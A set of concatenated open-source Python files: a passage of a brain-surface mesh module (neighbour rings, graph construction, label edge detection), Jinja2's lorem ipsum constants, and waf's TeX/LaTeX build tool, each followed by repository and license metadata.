err = ("FFmpeg failed, no file created; see log for more more "
"information.")
raise RuntimeError(err)
def get_n_ring_neighbor(faces, n=1, ordinal=False, mask=None):
"""
get n ring neighbor from faces array
Parameters
----------
faces : numpy array
the array of shape [n_triangles, 3]
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
specify a area where the ROI is
non-ROI element's value is zero
Returns
-------
lists
each index of the list represents a vertex number
each element is a set which includes neighbors of corresponding vertex
"""
n_vtx = np.max(faces) + 1 # get the number of vertices
if mask is not None and np.nonzero(mask)[0].shape[0] == n_vtx:
# In this case, the mask covers all vertices and is equal to have no mask (None).
# So the program reset it as a None that it will save the computational cost.
mask = None
# find 1_ring neighbors' id for each vertex
coo_w = mesh_edges(faces)
csr_w = coo_w.tocsr()
if mask is None:
vtx_iter = range(n_vtx)
n_ring_neighbors = [csr_w.indices[csr_w.indptr[i]:csr_w.indptr[i+1]] for i in vtx_iter]
n_ring_neighbors = [set(i) for i in n_ring_neighbors]
else:
mask_id = np.nonzero(mask)[0]
vtx_iter = mask_id
n_ring_neighbors = [set(csr_w.indices[csr_w.indptr[i]:csr_w.indptr[i+1]])
if mask[i] != 0 else set() for i in range(n_vtx)]
for vtx in vtx_iter:
neighbor_set = n_ring_neighbors[vtx]
neighbor_iter = list(neighbor_set)
for i in neighbor_iter:
if mask[i] == 0:
neighbor_set.discard(i)
if n > 1:
# find n_ring neighbors
one_ring_neighbors = [i.copy() for i in n_ring_neighbors]
n_th_ring_neighbors = [i.copy() for i in n_ring_neighbors]
# if n>1, go to get more neighbors
for i in range(n-1):
for neighbor_set in n_th_ring_neighbors:
neighbor_set_tmp = neighbor_set.copy()
for v_id in neighbor_set_tmp:
neighbor_set.update(one_ring_neighbors[v_id])
if i == 0:
for v_id in vtx_iter:
n_th_ring_neighbors[v_id].remove(v_id)
for v_id in vtx_iter:
n_th_ring_neighbors[v_id] -= n_ring_neighbors[v_id] # get the (i+2)_th ring neighbors
n_ring_neighbors[v_id] |= n_th_ring_neighbors[v_id] # get the (i+2) ring neighbors
elif n == 1:
n_th_ring_neighbors = n_ring_neighbors
else:
raise RuntimeError("The number of rings should be equal or greater than 1!")
if ordinal:
return n_th_ring_neighbors
else:
return n_ring_neighbors
def get_vtx_neighbor(vtx, faces, n=1, ordinal=False, mask=None):
"""
Get one vertex's n-ring neighbor vertices
Parameters
----------
vtx : integer
a vertex's id
faces : numpy array
the array of shape [n_triangles, 3]
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
specify a area where the ROI is in.
Return
------
neighbors : set
contain neighbors of the vtx
"""
n_ring_neighbors = _get_vtx_neighbor(vtx, faces, mask)
n_th_ring_neighbors = n_ring_neighbors.copy()
for i in range(n-1):
neighbors_tmp = set()
for neighbor in n_th_ring_neighbors:
neighbors_tmp.update(_get_vtx_neighbor(neighbor, faces, mask))
if i == 0:
neighbors_tmp.discard(vtx)
n_th_ring_neighbors = neighbors_tmp.difference(n_ring_neighbors)
n_ring_neighbors.update(n_th_ring_neighbors)
if ordinal:
return n_th_ring_neighbors
else:
return n_ring_neighbors
def _get_vtx_neighbor(vtx, faces, mask=None):
"""
Get one vertex's 1-ring neighbor vertices
Parameters
----------
vtx : integer
a vertex's id
faces : numpy array
the array of shape [n_triangles, 3]
mask : 1-D numpy array
specify a area where the ROI is in.
Return
------
neighbors : set
contain neighbors of the vtx
"""
row_indices, _ = np.where(faces == vtx)
neighbors = set(np.unique(faces[row_indices]))
neighbors.discard(vtx)
if mask is not None:
neighbor_iter = list(neighbors)
for i in neighbor_iter:
if mask[i] == 0:
neighbors.discard(i)
return neighbors
def mesh2edge_list(faces, n=1, ordinal=False, mask=None, vtx_signal=None,
weight_type=('dissimilar', 'euclidean'), weight_normalization=False):
"""
get edge_list according to mesh's geometry and vtx_signal
The edge_list can be used to create graph or adjacent matrix
Parameters
----------
faces : a array with shape (n_triangles, 3)
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
specify a area where the ROI is
non-ROI element's value is zero
vtx_signal : numpy array
NxM array, N is the number of vertices,
M is the number of measurements and time points.
weight_type : (str1, str2)
The rule used for calculating weights
such as ('dissimilar', 'euclidean') and ('similar', 'pearson correlation')
weight_normalization : bool
If it is False, do nothing.
If it is True, normalize weights to [0, 1].
After doing this, greater the weight is, two vertices of the edge are more related.
Returns
-------
row_ind : list
row indices of edges
col_ind : list
column indices of edges
edge_data : list
edge data of the edges-zip(row_ind, col_ind)
"""
n_ring_neighbors = get_n_ring_neighbor(faces, n, ordinal, mask)
row_ind = [i for i, neighbors in enumerate(n_ring_neighbors) for v_id in neighbors]
col_ind = [v_id for neighbors in n_ring_neighbors for v_id in neighbors]
if vtx_signal is None:
# create unweighted edges
n_edge = len(row_ind) # the number of edges
edge_data = np.ones(n_edge)
else:
# calculate weights according to mesh's geometry and vertices' signal
if weight_type[0] == 'dissimilar':
if weight_type[1] == 'euclidean':
edge_data = [pdist(vtx_signal[[i, j]], metric=weight_type[1])[0]
for i, j in zip(row_ind, col_ind)]
elif weight_type[1] == 'relative_euclidean':
edge_data = []
for i, j in zip(row_ind, col_ind):
euclidean = pdist(vtx_signal[[i, j]], metric='euclidean')[0]
sum_ij = np.sum(abs(vtx_signal[[i, j]]))
if sum_ij:
edge_data.append(float(euclidean) / sum_ij)
else:
edge_data.append(0)
else:
raise RuntimeError("The weight_type-{} is not supported now!".format(weight_type))
if weight_normalization:
max_dissimilar = np.max(edge_data)
min_dissimilar = np.min(edge_data)
edge_data = [(max_dissimilar-dist)/(max_dissimilar-min_dissimilar) for dist in edge_data]
elif weight_type[0] == 'similar':
if weight_type[1] == 'pearson correlation':
edge_data = [pearsonr(vtx_signal[i], vtx_signal[j])[0] for i, j in zip(row_ind, col_ind)]
elif weight_type[1] == 'mean':
edge_data = [np.mean(vtx_signal[[i, j]]) for i, j in zip(row_ind, col_ind)]
else:
raise RuntimeError("The weight_type-{} is not supported now!".format(weight_type))
if weight_normalization:
max_similar = np.max(edge_data)
min_similar = np.min(edge_data)
edge_data = [(simi-min_similar)/(max_similar-min_similar) for simi in edge_data]
else:
raise TypeError("The weight_type-{} is not supported now!".format(weight_type))
return row_ind, col_ind, edge_data
def mesh2adjacent_matrix(faces, n=1, ordinal=False, mask=None, vtx_signal=None,
weight_type=('dissimilar', 'euclidean'), weight_normalization=False):
"""
get adjacent matrix according to mesh's geometry and vtx_signal
Parameters
----------
faces : a array with shape (n_triangles, 3)
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
specify a area where the ROI is
non-ROI element's value is zero
vtx_signal : numpy array
NxM array, N is the number of vertices,
M is the number of measurements and time points.
weight_type : (str1, str2)
The rule used for calculating weights
such as ('dissimilar', 'euclidean') and ('similar', 'pearson correlation')
weight_normalization : bool
If it is False, do nothing.
If it is True, normalize weights to [0, 1].
After doing this, greater the weight is, two vertices of the edge are more related.
Returns
-------
adjacent_matrix : coo matrix
"""
n_vtx = np.max(faces) + 1
row_ind, col_ind, edge_data = mesh2edge_list(faces, n, ordinal, mask, vtx_signal,
weight_type, weight_normalization)
adjacent_matrix = sparse.coo_matrix((edge_data, (row_ind, col_ind)), (n_vtx, n_vtx))
return adjacent_matrix
def mesh2graph(faces, n=1, ordinal=False, mask=None, vtx_signal=None,
weight_type=('dissimilar', 'euclidean'), weight_normalization=True):
"""
create graph according to mesh's geometry and vtx_signal
Parameters
----------
faces : a array with shape (n_triangles, 3)
n : integer
specify which ring should be got
ordinal : bool
True: get the n_th ring neighbor
False: get the n ring neighbor
mask : 1-D numpy array
specify a area where the ROI is
non-ROI element's value is zero
vtx_signal : numpy array
NxM array, N is the number of vertices,
M is the number of measurements and time points.
weight_type : (str1, str2)
The rule used for calculating weights
such as ('dissimilar', 'euclidean') and ('similar', 'pearson correlation')
weight_normalization : bool
If it is False, do nothing.
If it is True, normalize weights to [0, 1].
After doing this, greater the weight is, two vertices of the edge are more related.
Returns
-------
graph : nx.Graph
"""
row_ind, col_ind, edge_data = mesh2edge_list(faces, n, ordinal, mask, vtx_signal,
weight_type, weight_normalization)
graph = Graph()
# Actually, add_weighted_edges_from is only used to add edges. If we intend to create graph by the method only,
# all of the graph's nodes must have at least one edge. However, maybe some special graphs contain nodes
# which have no edge connected. So we need add extra nodes.
if mask is None:
n_vtx = np.max(faces) + 1
graph.add_nodes_from(range(n_vtx))
else:
vertices = np.nonzero(mask)[0]
graph.add_nodes_from(vertices)
# add_weighted_edges_from is faster than from_scipy_sparse_matrix and from_numpy_matrix
# add_weighted_edges_from is also faster than default constructor
# To get more related information, please refer to
# http://stackoverflow.com/questions/24681677/transform-csr-matrix-into-networkx-graph
graph.add_weighted_edges_from(zip(row_ind, col_ind, edge_data))
return graph
def binary_shrink(bin_data, faces, n=1, n_ring_neighbors=None):
"""
shrink bin_data
Parameters
----------
bin_data : 1-D numpy array
Each array index is corresponding to vertex id in the faces.
Each element is a bool.
faces : numpy array
the array of shape [n_triangles, 3]
n : integer
specify which ring should be got
n_ring_neighbors : list
If this parameter is not None, two parameters ('faces', 'n') will be ignored.
It is used to save time when someone repeatedly uses the function with
a same n_ring_neighbors which can be got by get_n_ring_neighbor.
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
Return
------
new_data : 1-D numpy array with bool elements
The output of the bin_data after binary shrink
"""
if bin_data.dtype != np.bool:
raise TypeError("The input dtype must be bool")
vertices = np.where(bin_data)[0]
new_data = np.zeros_like(bin_data)
if n_ring_neighbors is None:
n_ring_neighbors = get_n_ring_neighbor(faces, n)
for v_id in vertices:
neighbors_values = [bin_data[_] for _ in n_ring_neighbors[v_id]]
if np.all(neighbors_values):
new_data[v_id] = True
return new_data
def binary_expand(bin_data, faces, n=1, n_ring_neighbors=None):
"""
expand bin_data
Parameters
----------
bin_data : 1-D numpy array
Each array index is corresponding to vertex id in the faces.
Each element is a bool.
faces : numpy array
the array of shape [n_triangles, 3]
n : integer
specify which ring should be got
n_ring_neighbors : list
If this parameter is not None, two parameters ('faces' and 'n') will be ignored.
It is used to save time when someone repeatedly uses the function with
a same n_ring_neighbors which can be got by get_n_ring_neighbor.
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
Return
------
new_data : 1-D numpy array with bool elements
The output of the bin_data after binary expand
"""
if bin_data.dtype != np.bool:
raise TypeError("The input dtype must be bool")
vertices = np.where(bin_data)[0]
new_data = bin_data.copy()
if n_ring_neighbors is None:
n_ring_neighbors = get_n_ring_neighbor(faces, n)
for v_id in vertices:
neighbors_values = [bin_data[_] for _ in n_ring_neighbors[v_id]]
if not np.all(neighbors_values):
new_data[list(n_ring_neighbors[v_id])] = True
return new_data
def label_edge_detection(data, faces, edge_type="inner", neighbors=None):
"""
edge detection for labels
Parameters
----------
data : 1-D numpy array
Each array index is corresponding to vertex id in the faces.
Each element is a label id.
faces : numpy array
the array of shape [n_triangles, 3]
edge_type : str
"inner" means inner edges of labels.
"outer" means outer edges of labels.
"both" means both of them in one array
"split" means returning inner and outer edges in two arrays respectively
neighbors : list
If this parameter is not None, a parameters ('faces') will be ignored.
It is used to save time when someone repeatedly uses the function with
a same neighbors which can be got by get_n_ring_neighbor.
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
Return
------
inner_data : 1-D numpy array
the inner edges of the labels
outer_data : 1-D numpy array
the outer edges of the labels
It's worth noting that outer_data's element values may
be not strictly corresponding to labels' id when
there are some labels which are too close.
"""
# data preparation
vertices = np.nonzero(data)[0]
inner_data = np.zeros_like(data)
outer_data = np.zeros_like(data)
if neighbors is None:
neighbors = get_n_ring_neighbor(faces)
# look for edges
for v_id in vertices:
neighbors_values = [data[_] for _ in neighbors[v_id]]
if min(neighbors_values) != max(neighbors_values):
if edge_type in ("inner", "both", "split"):
inner_data[v_id] = data[v_id]
if edge_type in ("outer", "both", "split"):
outer_vtx = [vtx for vtx in neighbors[v_id] if data[v_id] != data[vtx]]
outer_data[outer_vtx] = data[v_id]
# return results
if edge_type == "inner":
return inner_data
elif edge_type == "outer":
return outer_data
elif edge_type == "both":
return inner_data + outer_data
elif edge_type == "split":
return inner_data, outer_data
else:
raise ValueError("The argument 'edge_type' must be one of the (inner, outer, both, split)")
def get_patch_by_crg(vertices, neighbors_list):
"""
Find patches in the 'vertices', as a result, a vertex is capable of connecting with other vertices
in the same patch, but can't connect with vertices in other patches.
The function is similar as connected component detection in graph theory.
:param vertices: set
:param neighbors_list: list
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
:return: patches
Each element of it is a collection of vertices, that is a patch.
"""
from froi.algorithm.regiongrow import RegionGrow
patches = []
while vertices:
seed = vertices.pop()
patch = RegionGrow().connectivity_grow([[seed]], neighbors_list)[0]
patches.append(list(patch))
vertices.difference_update(patch)
return patches
class LabelAssessment(object):
@staticmethod
def transition_level(label, data, faces, neighbors=None, relative=False):
"""
Calculate the transition level on the region's boundary.
The result is regarded as the region's assessed value.
Adapted from (Chantal et al. 2002).
Parameters
----------
label : list
a collection of vertices with the label
data : numpy array
scalar data with the shape (#vertices, #features)
faces : numpy array
the array of shape [n_triangles, 3]
neighbors : list
If this parameter is not None, the parameter ('faces') will be ignored.
It is used to save time when someone repeatedly uses the function with
a same neighbors which can be got by get_n_ring_neighbor.
The indices are vertices' id of a mesh.
One index's corresponding element is a collection of vertices which connect with the index.
relative: bool
If True, divide the transition level by the sum of the couple's absolute value.
Return
------
assessed_value : float
Larger is often better.
"""
label_data = np.zeros_like(data, dtype=np.int8)
label_data[label] = 1
inner_data = label_edge_detection(label_data, faces, "inner", neighbors)
inner_edge = np.nonzero(inner_data)[0]
count = 0
sum_tmp = 0
for vtx_i in inner_edge:
for vtx_o in neighbors[vtx_i]:
if label_data[vtx_o] == 0:
couple_signal = data[[vtx_i, vtx_o]]
euclidean = float(pdist(couple_signal)[0])
if relative:
denominator = np.sum(abs(couple_signal))
euclidean = euclidean / denominator if denominator else 0
sum_tmp += euclidean
count += 1
return sum_tmp / float(count) if count else 0
if __name__ == '__main__':
from nibabel.freesurfer import read_geometry
from froi.io.surf_io import read_scalar_data
from networkx import Graph
from graph_tool import graph2parcel, node_attr2array
import nibabel as nib
coords, faces = read_geometry('/nfs/t1/nsppara/corticalsurface/fsaverage5/surf/rh.inflated')
scalar = read_scalar_data('/nfs/t3/workingshop/chenxiayu/data/region-growing-froi/S1/surf/'
'rh_zstat1_1w_fracavg.mgz')
# faces = np.array([[1, 2, 3], [0, 1, 3]])
# scalar = np.array([[1], [2], [3], [4]])
graph = mesh2graph(faces, vtx_signal=scalar, weight_normalization=True)
graph, parcel_neighbors = graph2parcel(graph, n=5000)
labels = [attrs['label'] for attrs in graph.node.values()]
print 'finish ncut!'
labels = np.unique(labels)
print len(labels)
print np.max(labels)
arr = node_attr2array(graph, ('label',))
# zero_idx = np.where(map(lambda x: x not in parcel_neighbors[800], arr))
# arr[zero_idx[0]] = 0
nib.save(nib.Nifti1Image(arr, np.eye(4)), '/nfs/t3/workingshop/chenxiayu/test/cxy/ncut_label_1w_5000.nii')
| bsd-3-clause |
djphan/c410-Repo | c410-Lab4_5_Flask/env-lab4/lib/python2.7/site-packages/jinja2/constants.py | 1169 | 1626 | # -*- coding: utf-8 -*-
"""
jinja.constants
~~~~~~~~~~~~~~~
Various constants.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
#: list of lorem ipsum words used by the lipsum() helper function
LOREM_IPSUM_WORDS = u'''\
a ac accumsan ad adipiscing aenean aliquam aliquet amet ante aptent arcu at
auctor augue bibendum blandit class commodo condimentum congue consectetuer
consequat conubia convallis cras cubilia cum curabitur curae cursus dapibus
diam dictum dictumst dignissim dis dolor donec dui duis egestas eget eleifend
elementum elit enim erat eros est et etiam eu euismod facilisi facilisis fames
faucibus felis fermentum feugiat fringilla fusce gravida habitant habitasse hac
hendrerit hymenaeos iaculis id imperdiet in inceptos integer interdum ipsum
justo lacinia lacus laoreet lectus leo libero ligula litora lobortis lorem
luctus maecenas magna magnis malesuada massa mattis mauris metus mi molestie
mollis montes morbi mus nam nascetur natoque nec neque netus nibh nisi nisl non
nonummy nostra nulla nullam nunc odio orci ornare parturient pede pellentesque
penatibus per pharetra phasellus placerat platea porta porttitor posuere
potenti praesent pretium primis proin pulvinar purus quam quis quisque rhoncus
ridiculus risus rutrum sagittis sapien scelerisque sed sem semper senectus sit
sociis sociosqu sodales sollicitudin suscipit suspendisse taciti tellus tempor
tempus tincidunt torquent tortor tristique turpis ullamcorper ultrices
ultricies urna ut varius vehicula vel velit venenatis vestibulum vitae vivamus
viverra volutpat vulputate'''
| gpl-3.0 |
fauferoth/assignment | .mywaflib/waflib/Tools/tex.py | 4 | 14765 | #!/usr/bin/env python
# encoding: utf-8
# Thomas Nagy, 2006-2010 (ita)
"""
TeX/LaTeX/PDFLaTeX/XeLaTeX support
Example::
def configure(conf):
conf.load('tex')
if not conf.env.LATEX:
conf.fatal('The program LaTex is required')
def build(bld):
bld(
features = 'tex',
type = 'latex', # pdflatex or xelatex
source = 'document.ltx', # mandatory, the source
outs = 'ps', # 'pdf' or 'ps pdf'
deps = 'crossreferencing.lst', # to give dependencies directly
prompt = 1, # 0 for the batch mode
)
Notes:
- To configure with a special program, use::
$ PDFLATEX=luatex waf configure
- This tool doesn't use the target attribute of the task generator
(``bld(target=...)``); the target file name is built from the source
base name and the out type(s)
"""
import os, re
from waflib import Utils, Task, Errors, Logs, Node
from waflib.TaskGen import feature, before_method
re_bibunit = re.compile(r'\\(?P<type>putbib)\[(?P<file>[^\[\]]*)\]',re.M)
def bibunitscan(self):
"""
Parse the inputs and try to find the *bibunit* dependencies
:return: list of bibunit files
:rtype: list of :py:class:`waflib.Node.Node`
"""
node = self.inputs[0]
nodes = []
if not node: return nodes
code = node.read()
for match in re_bibunit.finditer(code):
path = match.group('file')
if path:
for k in ('', '.bib'):
# add another loop for the tex include paths?
Logs.debug('tex: trying %s%s' % (path, k))
fi = node.parent.find_resource(path + k)
if fi:
nodes.append(fi)
# no break, people are crazy
else:
Logs.debug('tex: could not find %s' % path)
Logs.debug("tex: found the following bibunit files: %s" % nodes)
return nodes
exts_deps_tex = ['', '.ltx', '.tex', '.bib', '.pdf', '.png', '.eps', '.ps', '.sty']
"""List of typical file extensions included in latex files"""
exts_tex = ['.ltx', '.tex']
"""List of typical file extensions that contain latex"""
re_tex = re.compile(r'\\(?P<type>usepackage|RequirePackage|include|bibliography([^\[\]{}]*)|putbib|includegraphics|input|import|bringin|lstinputlisting)(\[[^\[\]]*\])?{(?P<file>[^{}]*)}',re.M)
"""Regexp for expressions that may include latex files"""
g_bibtex_re = re.compile('bibdata', re.M)
"""Regexp for bibtex files"""
g_glossaries_re = re.compile('\\@newglossary', re.M)
"""Regexp for expressions that create glossaries"""
class tex(Task.Task):
"""
Compile a tex/latex file.
.. inheritance-diagram:: waflib.Tools.tex.latex waflib.Tools.tex.xelatex waflib.Tools.tex.pdflatex
"""
bibtex_fun, _ = Task.compile_fun('${BIBTEX} ${BIBTEXFLAGS} ${SRCFILE}', shell=False)
bibtex_fun.__doc__ = """
Execute the program **bibtex**
"""
makeindex_fun, _ = Task.compile_fun('${MAKEINDEX} ${MAKEINDEXFLAGS} ${SRCFILE}', shell=False)
makeindex_fun.__doc__ = """
Execute the program **makeindex**
"""
makeglossaries_fun, _ = Task.compile_fun('${MAKEGLOSSARIES} ${SRCFILE}', shell=False)
makeglossaries_fun.__doc__ = """
Execute the program **makeglossaries**
"""
def exec_command(self, cmd, **kw):
"""
Override :py:meth:`waflib.Task.Task.exec_command` to execute the command without buffering (latex may prompt for inputs)
:return: the return code
:rtype: int
"""
bld = self.generator.bld
Logs.info('runner: %r' % cmd)
try:
if not kw.get('cwd', None):
kw['cwd'] = bld.cwd
except AttributeError:
bld.cwd = kw['cwd'] = bld.variant_dir
return Utils.subprocess.Popen(cmd, **kw).wait()
def scan_aux(self, node):
"""
A recursive regex-based scanner that finds included auxiliary files.
"""
nodes = [node]
re_aux = re.compile(r'\\@input{(?P<file>[^{}]*)}', re.M)
def parse_node(node):
code = node.read()
for match in re_aux.finditer(code):
path = match.group('file')
found = node.parent.find_or_declare(path)
if found and found not in nodes:
Logs.debug('tex: found aux node ' + found.abspath())
nodes.append(found)
parse_node(found)
parse_node(node)
return nodes
def scan(self):
"""
A recursive regex-based scanner that finds latex dependencies. It uses :py:attr:`waflib.Tools.tex.re_tex`
Depending on your needs you might want:
* to change re_tex::
from waflib.Tools import tex
tex.re_tex = myregex
* or to change the method scan from the latex tasks::
from waflib.Task import classes
classes['latex'].scan = myscanfunction
"""
node = self.inputs[0]
nodes = []
names = []
seen = []
if not node: return (nodes, names)
def parse_node(node):
if node in seen:
return
seen.append(node)
code = node.read()
global re_tex
for match in re_tex.finditer(code):
multibib = match.group('type')
if multibib and multibib.startswith('bibliography'):
multibib = multibib[len('bibliography'):]
if multibib.startswith('style'):
continue
else:
multibib = None
for path in match.group('file').split(','):
if path:
add_name = True
found = None
for k in exts_deps_tex:
# issue 1067, scan in all texinputs folders
for up in self.texinputs_nodes:
Logs.debug('tex: trying %s%s' % (path, k))
found = up.find_resource(path + k)
if found:
break
for tsk in self.generator.tasks:
if not found or found in tsk.outputs:
break
else:
nodes.append(found)
add_name = False
for ext in exts_tex:
if found.name.endswith(ext):
parse_node(found)
break
# multibib stuff
if found and multibib and found.name.endswith('.bib'):
try:
self.multibibs.append(found)
except AttributeError:
self.multibibs = [found]
# no break, people are crazy
if add_name:
names.append(path)
parse_node(node)
for x in nodes:
x.parent.get_bld().mkdir()
Logs.debug("tex: found the following : %s and names %s" % (nodes, names))
return (nodes, names)
def check_status(self, msg, retcode):
"""
Check an exit status and raise an error with a particular message
:param msg: message to display if the code is non-zero
:type msg: string
:param retcode: condition
:type retcode: boolean
"""
if retcode != 0:
raise Errors.WafError("%r command exit status %r" % (msg, retcode))
def bibfile(self):
"""
Parse the *.aux* files to find bibfiles to process.
If yes, execute :py:meth:`waflib.Tools.tex.tex.bibtex_fun`
"""
for aux_node in self.aux_nodes:
try:
ct = aux_node.read()
except EnvironmentError:
Logs.error('Error reading %s: %r' % aux_node.abspath())
continue
if g_bibtex_re.findall(ct):
Logs.info('calling bibtex')
self.env.env = {}
self.env.env.update(os.environ)
self.env.env.update({'BIBINPUTS': self.texinputs(), 'BSTINPUTS': self.texinputs()})
self.env.SRCFILE = aux_node.name[:-4]
self.check_status('error when calling bibtex', self.bibtex_fun())
for node in getattr(self, 'multibibs', []):
self.env.env = {}
self.env.env.update(os.environ)
self.env.env.update({'BIBINPUTS': self.texinputs(), 'BSTINPUTS': self.texinputs()})
self.env.SRCFILE = node.name[:-4]
self.check_status('error when calling bibtex', self.bibtex_fun())
def bibunits(self):
"""
Parse the *.aux* file to find bibunit files. If there are bibunit files,
execute :py:meth:`waflib.Tools.tex.tex.bibtex_fun`.
"""
try:
bibunits = bibunitscan(self)
except OSError:
Logs.error('error bibunitscan')
else:
if bibunits:
fn = ['bu' + str(i) for i in range(1, len(bibunits) + 1)]
if fn:
Logs.info('calling bibtex on bibunits')
for f in fn:
self.env.env = {'BIBINPUTS': self.texinputs(), 'BSTINPUTS': self.texinputs()}
self.env.SRCFILE = f
self.check_status('error when calling bibtex', self.bibtex_fun())
def makeindex(self):
"""
Look on the filesystem if there is a *.idx* file to process. If yes, execute
:py:meth:`waflib.Tools.tex.tex.makeindex_fun`
"""
self.idx_node = self.inputs[0].change_ext('.idx')
try:
idx_path = self.idx_node.abspath()
os.stat(idx_path)
except OSError:
Logs.info('index file %s absent, not calling makeindex' % idx_path)
else:
Logs.info('calling makeindex')
self.env.SRCFILE = self.idx_node.name
self.env.env = {}
self.check_status('error when calling makeindex %s' % idx_path, self.makeindex_fun())
def bibtopic(self):
"""
Additional .aux files from the bibtopic package
"""
p = self.inputs[0].parent.get_bld()
if os.path.exists(os.path.join(p.abspath(), 'btaux.aux')):
self.aux_nodes += p.ant_glob('*[0-9].aux')
def makeglossaries(self):
src_file = self.inputs[0].abspath()
base_file = os.path.basename(src_file)
base, _ = os.path.splitext(base_file)
for aux_node in self.aux_nodes:
try:
ct = aux_node.read()
except EnvironmentError:
Logs.error('Error reading %s: %r' % aux_node.abspath())
continue
if g_glossaries_re.findall(ct):
if not self.env.MAKEGLOSSARIES:
raise Errors.WafError("The program 'makeglossaries' is missing!")
Logs.warn('calling makeglossaries')
self.env.SRCFILE = base
self.check_status('error when calling makeglossaries %s' % base, self.makeglossaries_fun())
return
def texinputs(self):
return os.pathsep.join([k.abspath() for k in self.texinputs_nodes]) + os.pathsep
def run(self):
"""
Runs the TeX build process.
It may require multiple passes, depending on the usage of cross-references,
bibliographies, content susceptible of needing such passes.
The appropriate TeX compiler is called until the *.aux* files stop changing.
Makeindex and bibtex are called if necessary.
"""
env = self.env
if not env['PROMPT_LATEX']:
env.append_value('LATEXFLAGS', '-interaction=batchmode')
env.append_value('PDFLATEXFLAGS', '-interaction=batchmode')
env.append_value('XELATEXFLAGS', '-interaction=batchmode')
# important, set the cwd for everybody
self.cwd = self.inputs[0].parent.get_bld().abspath()
Logs.info('first pass on %s' % self.__class__.__name__)
# Hash .aux files before even calling the LaTeX compiler
cur_hash = self.hash_aux_nodes()
self.call_latex()
# Find the .aux files again since bibtex processing can require it
self.hash_aux_nodes()
self.bibtopic()
self.bibfile()
self.bibunits()
self.makeindex()
self.makeglossaries()
for i in range(10):
# There is no need to call latex again if the .aux hash value has not changed
prev_hash = cur_hash
cur_hash = self.hash_aux_nodes()
if not cur_hash:
Logs.error('No aux.h to process')
if cur_hash and cur_hash == prev_hash:
break
# run the command
Logs.info('calling %s' % self.__class__.__name__)
self.call_latex()
def hash_aux_nodes(self):
try:
self.aux_nodes
except AttributeError:
try:
self.aux_nodes = self.scan_aux(self.inputs[0].change_ext('.aux'))
except IOError:
return None
return Utils.h_list([Utils.h_file(x.abspath()) for x in self.aux_nodes])
def call_latex(self):
self.env.env = {}
self.env.env.update(os.environ)
self.env.env.update({'TEXINPUTS': self.texinputs()})
self.env.SRCFILE = self.inputs[0].abspath()
self.check_status('error when calling latex', self.texfun())
class latex(tex):
texfun, vars = Task.compile_fun('${LATEX} ${LATEXFLAGS} ${SRCFILE}', shell=False)
class pdflatex(tex):
texfun, vars = Task.compile_fun('${PDFLATEX} ${PDFLATEXFLAGS} ${SRCFILE}', shell=False)
class xelatex(tex):
texfun, vars = Task.compile_fun('${XELATEX} ${XELATEXFLAGS} ${SRCFILE}', shell=False)
class dvips(Task.Task):
run_str = '${DVIPS} ${DVIPSFLAGS} ${SRC} -o ${TGT}'
color = 'BLUE'
after = ['latex', 'pdflatex', 'xelatex']
class dvipdf(Task.Task):
run_str = '${DVIPDF} ${DVIPDFFLAGS} ${SRC} ${TGT}'
color = 'BLUE'
after = ['latex', 'pdflatex', 'xelatex']
class pdf2ps(Task.Task):
run_str = '${PDF2PS} ${PDF2PSFLAGS} ${SRC} ${TGT}'
color = 'BLUE'
after = ['latex', 'pdflatex', 'xelatex']
@feature('tex')
@before_method('process_source')
def apply_tex(self):
"""
Create :py:class:`waflib.Tools.tex.tex` objects, and dvips/dvipdf/pdf2ps tasks if necessary (outs='ps', etc).
"""
if not getattr(self, 'type', None) in ('latex', 'pdflatex', 'xelatex'):
self.type = 'pdflatex'
outs = Utils.to_list(getattr(self, 'outs', []))
# prompt for incomplete files (else the batchmode is used)
self.env['PROMPT_LATEX'] = getattr(self, 'prompt', 1)
deps_lst = []
if getattr(self, 'deps', None):
deps = self.to_list(self.deps)
for dep in deps:
if isinstance(dep, str):
n = self.path.find_resource(dep)
if not n:
self.bld.fatal('Could not find %r for %r' % (dep, self))
if not n in deps_lst:
deps_lst.append(n)
elif isinstance(dep, Node.Node):
deps_lst.append(dep)
for node in self.to_nodes(self.source):
if self.type == 'latex':
task = self.create_task('latex', node, node.change_ext('.dvi'))
elif self.type == 'pdflatex':
task = self.create_task('pdflatex', node, node.change_ext('.pdf'))
elif self.type == 'xelatex':
task = self.create_task('xelatex', node, node.change_ext('.pdf'))
task.env = self.env
# add the manual dependencies
if deps_lst:
for n in deps_lst:
if not n in task.dep_nodes:
task.dep_nodes.append(n)
# texinputs is a nasty beast
if hasattr(self, 'texinputs_nodes'):
task.texinputs_nodes = self.texinputs_nodes
else:
task.texinputs_nodes = [node.parent, node.parent.get_bld(), self.path, self.path.get_bld()]
lst = os.environ.get('TEXINPUTS', '')
if self.env.TEXINPUTS:
lst += os.pathsep + self.env.TEXINPUTS
if lst:
lst = lst.split(os.pathsep)
for x in lst:
if x:
if os.path.isabs(x):
p = self.bld.root.find_node(x)
if p:
task.texinputs_nodes.append(p)
else:
Logs.error('Invalid TEXINPUTS folder %s' % x)
else:
Logs.error('Cannot resolve relative paths in TEXINPUTS %s' % x)
if self.type == 'latex':
if 'ps' in outs:
tsk = self.create_task('dvips', task.outputs, node.change_ext('.ps'))
tsk.env.env = dict(os.environ)
if 'pdf' in outs:
tsk = self.create_task('dvipdf', task.outputs, node.change_ext('.pdf'))
tsk.env.env = dict(os.environ)
elif self.type == 'pdflatex':
if 'ps' in outs:
self.create_task('pdf2ps', task.outputs, node.change_ext('.ps'))
self.source = []
def configure(self):
"""
Try to find the programs tex, latex and others. Do not raise any error if they
are not found.
"""
v = self.env
for p in 'tex latex pdflatex xelatex bibtex dvips dvipdf ps2pdf makeindex pdf2ps makeglossaries'.split():
try:
self.find_program(p, var=p.upper())
except self.errors.ConfigurationError:
pass
